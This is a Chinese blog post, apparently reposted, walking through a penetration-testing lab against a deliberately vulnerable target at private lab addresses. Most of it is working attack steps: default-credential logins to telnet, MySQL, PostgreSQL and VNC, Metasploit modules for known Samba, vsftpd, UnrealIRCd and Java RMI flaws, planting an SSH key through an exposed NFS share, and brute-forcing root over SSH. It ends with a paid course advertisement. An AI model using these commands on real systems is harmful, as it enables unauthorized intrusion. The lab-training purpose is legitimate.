Kali与编程_小白黑客是如何进行漏洞攻防演练的

2022-03-13 01:32栏目:互联网
TAG:

一、系统弱密码登录

1、在kali上执行命令行telnet 192.168.26.129

2、Login和password都输入msfadmin

3、登录成功,进入系统

4、测试如下:

二、MySQL弱密码登录:

1、在kali上执行mysql –h 192.168.26.129 –u root

2、登录成功,进入MySQL系统

3、测试效果:

三、PostgreSQL弱密码登录

1、在Kali上执行psql -h 192.168.26.129 –U postgres

2、输入密码:postgres

3、登录成功,进入postgresql系统

测试效果

四、VNC弱密码登录

1、在kali图形界面的终端中执行vncviewer 192.168.26.129

2、输入密码 password

3、登录成功,进入系统

测试效果:

五、Samba MS-RPC Shell 命令注入漏洞

利用步骤

1.在kali中执行msfconsole,启动metasploit

2.Use
exploit/multi/samba/usermap_script,选择漏洞库

3.Set RHOST 192.168.160.131 设置要攻击的机器IP

4.Exploit,开始攻击

5.利用成功,执行uname –a 验证

测试效果:

六、Vsftpd源码包后门漏洞

步骤

1、在kali中执行msfconsole,启动metasploit

2、use
exploit/unix/ftp/vsftpd_234_backdoor,选择漏洞

3、set RHOST 192.168.160.131

4、利用成功,执行uname –a 验证

5、测试过程:

七、UnreallRCd后门漏洞

步骤

1、在kali中执行msfconsole,启动metasploit

2、use
exploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞

set RHOST 192.168.160.131 ,设置要攻击的目标IP地址

3、开始攻击

4、利用成功!使用uname –a 验证

测试效果:

Linux NFS共享目录配置漏洞

问题:在(2)中需要创建 /tmp/test目录并在目录下创建,如未创建则不能进行下一步

步骤

在kali上执行命令rpcinfo –p 192.168.26.129 ,查看nfs服务有无开启showmount –e 192.168.26.129 查看其设置的远程目录列表输入ssh-keygen 生成RSA公钥依次输入:

(1)mount –t nfs 192.168.26.129://tmp/test(预先创建),把192.168.160.131的根目录挂载到/tmp/test/下;

注:如果提示下图中错误则需要/etc/init.d/rpcbind start 来启动mount

(2)cat /root/.ssh/id_rsa.pub>>
/tmp/test/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下:

(3)ssh root@192.168.26.129,实现无密码登录

Java RMI SERVER 命令执行漏洞(1099/tcp)

1.Nmap –p 0-65535 192.168.160.131 来查看1099端口是否开启

2.进入msfconsole框架,依次输入以下命令:

1)use exploit/multi/misc/java_rmi_server

2)set RHOST 192.168.26.129(靶机的IP地址)

3)run

4)session

5)shell(进入meterpreter时执行)

十、Root用户弱口令漏洞(SSH爆破)

步骤

输入nmap –sV -O(大写) 192.168.160.131 查看SSh端口是否开启开启metasploit framework 框架,依次输入:use auxiliary/scanner/ssh/ssh_loginset RHOSTS 192.168.160.131set USERNAME rootset PASS_FILE pass.txt(字典文件,需要预先生成)set THREADS 50run专栏1个月掌握Kali渗透与黑客编程作者:Kali与编程188币269人已购查看

本文来自网络,不代表山斋月平台立场,转载请注明出处: https://www.shanzhaiyue.top